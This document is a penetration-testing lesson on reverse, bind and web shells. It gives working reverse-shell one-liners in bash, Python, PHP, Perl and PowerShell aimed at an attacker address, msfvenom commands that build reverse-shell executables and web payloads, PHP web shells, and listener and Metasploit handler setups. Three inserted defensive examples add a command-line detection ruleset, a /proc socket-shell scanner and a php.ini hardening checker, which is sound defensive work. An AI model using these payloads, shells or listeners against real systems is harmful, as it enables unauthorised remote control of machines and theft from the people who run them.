Vulnerability Analysis & Exploitation

Shells, Payloads & Listeners


Getting a shell on a target system is your primary goal. This lesson covers the different types of shells and how to create them.

Shell Types Overview

Reverse Shell:
Target ────────────────→ Attacker
(Target initiates connection to you)
Best for: Bypassing firewalls

Bind Shell:
Attacker ────────────────→ Target
(Target opens port, you connect)
Best for: Direct network access

Web Shell:
Attacker ────HTTP────→ Target
(Commands via web interface)
Best for: Persistence, restricted environments

Setting Up Listeners

Netcat Listener (Basic)

# Basic listener
nc -lvnp 4444

# Extra verbosity (-v is already part of -lvnp; a second -v makes netcat chattier)
nc -lvnp 4444 -v

Flag  Purpose
-l    Listen mode
-v    Verbose
-n    No DNS resolution
-p    Port number

Rlwrap (Improved Shell)

# Better interactive shell with line editing
rlwrap nc -lvnp 4444

Pwncat (Advanced)

# Feature-rich handler
pwncat-cs -lp 4444

Reverse Shell Commands

One-Liners by Language

Bash:

bash -i >& /dev/tcp/10.10.14.5/4444 0>&1

Bash (alternative):

bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'

Python:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Python3:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

PHP:

php -r '$sock=fsockopen("10.10.14.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

Perl:

perl -e 'use Socket;$i="10.10.14.5";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

PowerShell:

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
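Every one-liner above has a recognisable shape on the wire and in process telemetry, which is what a detection engineer keys on. The following is an added example, not code from the lesson: it parses constructed execve-style audit records (a simplified `ts host uid comm cmdline` format assumed here) and flags command lines matching the bash, Python, Perl, PHP and PowerShell families listed above.

```python
"""Flag reverse-shell one-liners in captured process command lines.

Added example, not part of the original lesson. Each rule matches one of the
one-liner families listed above (bash /dev/tcp, python socket+dup2, perl
Socket+exec, php fsockopen, powershell TCPClient). The log lines are a
constructed, simplified execve-audit format: ts host uid comm cmdline.
"""
import re

# Loose patterns on purpose: they survive spacing/quoting changes but should
# be tuned against your own fleet's baseline to keep false positives down.
RULES = [
    ("bash_dev_tcp", re.compile(r"/dev/(tcp|udp)/\d{1,3}(\.\d{1,3}){3}/\d+")),
    ("python_socket_dup2", re.compile(r"socket\.socket\(.*\.connect\(.*dup2", re.S)),
    ("perl_socket_exec", re.compile(r"use Socket;.*connect\(.*exec\(", re.S)),
    ("php_fsockopen", re.compile(r"fsockopen\(.*(exec|system|passthru|popen)\(", re.S)),
    ("powershell_tcpclient", re.compile(r"Net\.Sockets\.TCPClient.*GetStream\(\).*\biex\b", re.I | re.S)),
]

# One record per line; cmdline is double-quoted with \" for embedded quotes.
LINE_RE = re.compile(
    r'^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+uid=(?P<uid>\d+)\s+comm=(?P<comm>\S+)'
    r'\s+cmdline="(?P<cmd>(?:[^"\\]|\\.)*)"'
)

# Constructed sample records (the attacker IP is the lesson's 10.10.14.5).
SAMPLE_LOG = r"""
2024-05-01T10:00:01Z host=web01 uid=33 comm=bash cmdline="bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"
2024-05-01T10:00:05Z host=web01 uid=33 comm=python3 cmdline="python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.10.14.5\",4444));os.dup2(s.fileno(),0);subprocess.call([\"/bin/sh\",\"-i\"])'"
2024-05-01T10:00:09Z host=web01 uid=33 comm=php cmdline="php -r '$sock=fsockopen(\"10.10.14.5\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"
2024-05-01T10:01:00Z host=web01 uid=1000 comm=curl cmdline="curl -s https://example.invalid/health"
2024-05-01T10:02:30Z host=ws07 uid=1001 comm=powershell.exe cmdline="powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.14.5',4444);$stream = $client.GetStream();$sendback = (iex $data 2>&1 | Out-String)\""
"""


def parse_line(line):
    """Return the record as a dict, or None for lines that do not parse."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["uid"] = int(rec["uid"])
    rec["cmd"] = re.sub(r"\\(.)", r"\1", rec["cmd"])  # undo \" escaping
    return rec


def match_rules(cmdline):
    """Names of all rules that fire on one command line."""
    return [name for name, pat in RULES if pat.search(cmdline)]


def scan(log_text):
    """Records that matched at least one rule, in log order."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        rules = match_rules(rec["cmd"])
        if rules:
            rec["rules"] = rules
            hits.append(rec)
    return hits


if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f'{h["ts"]} {h["host"]} uid={h["uid"]} {h["comm"]}: {", ".join(h["rules"])}')
```

Run as-is to see the four matching records; feed real auditd EXECVE or EDR process-creation events through `parse_line` by swapping `LINE_RE` for your source's format. The `uid=33` (www-data) hits beside an outbound connection to a non-corporate address are the combination worth alerting on, since a web worker has no business spawning an interactive shell.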

Generating Payloads with Msfvenom

Common Payloads

Linux Reverse Shell:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f elf -o shell.elf

Windows Reverse Shell:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o shell.exe

Windows Meterpreter (use only once in exam):

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f exe -o meterpreter.exe

Web Payloads

PHP:

msfvenom -p php/reverse_php LHOST=10.10.14.5 LPORT=4444 -f raw > shell.php

JSP:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f raw > shell.jsp

WAR:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f war > shell.war

ASP:

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f asp > shell.asp

Msfvenom Flag Reference

Flag   Purpose
-p     Payload to use
-f     Output format (elf, exe, raw, war, asp, ...)
-o     Output file
-e     Encoder
-b     Bad characters to avoid
LHOST  Your IP (where the payload connects back to)
LPORT  Your port

Upgrading Shells

Python PTY Upgrade

# On target after getting shell
python -c 'import pty; pty.spawn("/bin/bash")'
# or
python3 -c 'import pty; pty.spawn("/bin/bash")'

Full TTY Upgrade

# Step 1: Spawn a PTY
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Step 2: Background the shell (press Ctrl+Z in your terminal)
Ctrl+Z

# Step 3: Put your local terminal in raw mode and foreground the shell
stty raw -echo; fg

# Step 4: Set the environment inside the shell
export TERM=xterm
export SHELL=/bin/bash

Script Method

script /dev/null -c bash
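The PTY upgrade changes what the shell looks like to an investigator: before it, the shell's fds 0, 1 and 2 are the socket itself; after it, the new bash has a pseudo-terminal but its python parent still holds the socket. The following is an added example, not part of the lesson, that turns that observation into a host check. `collect_snapshot` reads a live Linux `/proc`; `SAMPLE_PROCS` is a constructed snapshot in the same shape, with invented pids and inode numbers.

```python
"""Spot shells whose standard streams are network sockets.

Added example, not from the original lesson. Every one-liner above ends the
same way: fds 0, 1 and 2 are pointed at a connected socket and a shell is
exec'd. On Linux that leaves a recognisable shape in /proc/<pid>/fd: a shell
or interpreter whose stdin/stdout/stderr resolve to "socket:[inode]". After
the pty upgrade shown above, the new bash has a pts for its stdio but its
python parent still has socket stdio, so shells whose parent was flagged are
reported too. SAMPLE_PROCS is a constructed snapshot in the shape that
collect_snapshot() builds from a live /proc.
"""
import os

SHELLS = {"sh", "bash", "dash", "zsh"}
INTERPRETERS = {"python", "python2", "python3", "perl", "php"}


def socket_stdio_count(fds):
    """How many of fd 0/1/2 are sockets. fds maps fd number -> readlink target."""
    return sum(1 for fd in (0, 1, 2) if fds.get(fd, "").startswith("socket:["))


def scan_snapshot(procs):
    """Return {pid: verdict} for suspicious processes in a snapshot.

    procs: list of dicts with keys pid, ppid, comm, fds.
    Verdicts: "socket_stdio_shell" (shell/interpreter with >=2 socket stdio fds)
    or "child_of_socket_shell" (a shell whose ancestor chain hits a verdict).
    """
    verdicts = {}
    for p in procs:
        if p["comm"] in SHELLS | INTERPRETERS and socket_stdio_count(p["fds"]) >= 2:
            verdicts[p["pid"]] = "socket_stdio_shell"
    # Propagate down the tree until nothing changes (handles bash -> bash chains).
    changed = True
    while changed:
        changed = False
        for p in procs:
            if p["pid"] not in verdicts and p["comm"] in SHELLS and p["ppid"] in verdicts:
                verdicts[p["pid"]] = "child_of_socket_shell"
                changed = True
    return verdicts


def collect_snapshot(proc_root="/proc"):
    """Build the snapshot from a live Linux procfs (needs permission to read fd links)."""
    procs = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        base = os.path.join(proc_root, entry)
        try:
            with open(os.path.join(base, "stat")) as f:
                stat = f.read()
            # Format: "pid (comm) state ppid ..."; comm may contain spaces or
            # parentheses, so split on the last ')'.
            comm = stat[stat.index("(") + 1 : stat.rindex(")")]
            ppid = int(stat[stat.rindex(")") + 1 :].split()[1])
            fds = {}
            for fd in (0, 1, 2):
                try:
                    fds[fd] = os.readlink(os.path.join(base, "fd", str(fd)))
                except OSError:
                    pass  # closed fd, or not ours to read
        except (OSError, ValueError, IndexError):
            continue  # process exited mid-scan or is unreadable
        procs.append({"pid": int(entry), "ppid": ppid, "comm": comm, "fds": fds})
    return procs


SAMPLE_PROCS = [  # constructed; pids and inode numbers are invented
    {"pid": 1, "ppid": 0, "comm": "systemd", "fds": {0: "/dev/null", 1: "/dev/null", 2: "/dev/null"}},
    {"pid": 812, "ppid": 1, "comm": "bash", "fds": {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}},
    # python one-liner: dup2 onto the socket, then subprocess.call(["/bin/sh","-i"])
    {"pid": 2200, "ppid": 1337, "comm": "python3", "fds": {0: "socket:[48211]", 1: "socket:[48211]", 2: "socket:[48211]"}},
    {"pid": 2201, "ppid": 2200, "comm": "sh", "fds": {0: "socket:[48211]", 1: "socket:[48211]", 2: "socket:[48211]"}},
    # the pty upgrade: python3 keeps the socket, the spawned bash gets a pts
    {"pid": 2205, "ppid": 2201, "comm": "python3", "fds": {0: "socket:[48211]", 1: "socket:[48211]", 2: "socket:[48211]"}},
    {"pid": 2206, "ppid": 2205, "comm": "bash", "fds": {0: "/dev/pts/2", 1: "/dev/pts/2", 2: "/dev/pts/2"}},
    # a php worker with only stderr on a socket: not enough to flag
    {"pid": 2300, "ppid": 700, "comm": "php", "fds": {0: "/dev/null", 1: "pipe:[3001]", 2: "socket:[48300]"}},
]

if __name__ == "__main__":
    snapshot = collect_snapshot() if os.path.isdir("/proc") else SAMPLE_PROCS
    for pid, verdict in sorted(scan_snapshot(snapshot).items()):
        print(pid, verdict)
```

Run it as root on a Linux host to scan live processes (unprivileged runs only see your own processes' fd links). Expect legitimate hits from socket-activated services that hand a shell its socket directly (inetd/xinetd-style setups), so treat the verdict as triage input and pair it with the owning uid and the socket's remote address from `ss -p`.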

Web Shells

Simple PHP Web Shell

<?php system($_GET['cmd']); ?>

Usage: http://target/shell.php?cmd=whoami

Interactive PHP Shell

<?php
// Runs the value of the cmd parameter (GET or POST) and returns its output
if (isset($_REQUEST['cmd'])) {
    echo "<pre>";
    $cmd = $_REQUEST['cmd'];
    system($cmd);
    echo "</pre>";
    die;
}
?>
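Both web shells above only work because PHP is allowed to call `system()`. The server-side control that removes that path is the `disable_functions` directive in php.ini. The following is an added example, not part of the lesson: a small checker that parses php.ini text and reports which shell-spawning functions are still callable. The two ini texts are constructed samples, and the parser assumes php.ini's conventions (`;` comments, and the last assignment of a directive wins).

```python
"""Report which shell-spawning PHP functions a php.ini still allows.

Added example, not from the lesson. Both web shells above reach the OS via
system(); disable_functions is the PHP-level control that removes that path
(exec/shell_exec/passthru/popen/proc_open are the alternatives a slightly
different shell would use, so they are checked too). Parsing follows php.ini
conventions: ';' starts a comment and a later assignment of the same
directive overrides an earlier one. The two ini texts are constructed.
"""

SHELL_FUNCS = {"system", "exec", "shell_exec", "passthru", "popen", "proc_open"}


def parse_disable_functions(ini_text):
    """Set of function names disabled by the last active disable_functions line."""
    disabled = set()
    for raw in ini_text.splitlines():
        line = raw.split(";", 1)[0].strip()  # drop comments (';' inside quotes not handled)
        if "=" not in line:
            continue  # blank lines and [section] headers
        key, _, value = line.partition("=")
        if key.strip().lower() == "disable_functions":
            value = value.strip().strip('"')
            disabled = {f.strip().lower() for f in value.split(",") if f.strip()}
    return disabled


def still_enabled(ini_text, wanted=SHELL_FUNCS):
    """Sorted list of the wanted functions that are NOT disabled."""
    return sorted(wanted - parse_disable_functions(ini_text))


# Constructed: the shape of a stock php.ini, where the directive is commented out.
SAMPLE_INI_DEFAULT = """\
[PHP]
; This directive allows you to disable certain functions.
; disable_functions =
expose_php = Off
"""

# Constructed: a hardened file where a later line tightens an earlier one.
SAMPLE_INI_HARDENED = """\
[PHP]
disable_functions = exec,passthru,shell_exec,system
; tightened further down the file; PHP keeps the last assignment
disable_functions = "exec, passthru, shell_exec, system, popen, proc_open"
expose_php = Off
"""

if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_INI_DEFAULT
    gaps = still_enabled(text)
    print("still enabled:", ", ".join(gaps) if gaps else "none")
```

Point it at the php.ini your server actually loads (`php --ini` shows the path). `disable_functions` can only be set there, not from `.htaccess` or `ini_set()`, which is also why a web shell cannot undo it; combine it with `open_basedir` and an upload directory that the web server will not execute PHP from.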

Common Web Shell Locations

Kali Linux:
/usr/share/webshells/
├── php/
│   ├── php-reverse-shell.php
│   └── simple-backdoor.php
├── asp/
└── jsp/

Listener Cheat Sheet

# Netcat
nc -lvnp 4444

# Netcat with rlwrap
rlwrap nc -lvnp 4444

# Socat (note: this serves /bin/bash on port 4444, i.e. a bind shell on the host that runs it, not a catcher for reverse shells)
socat TCP-LISTEN:4444,reuseaddr,fork EXEC:/bin/bash

# Metasploit handler
msfconsole -q
use exploit/multi/handler
set payload windows/x64/shell_reverse_tcp
set LHOST 10.10.14.5
set LPORT 4444
run

Next, we'll cover file transfer techniques to move exploits and tools to target systems.
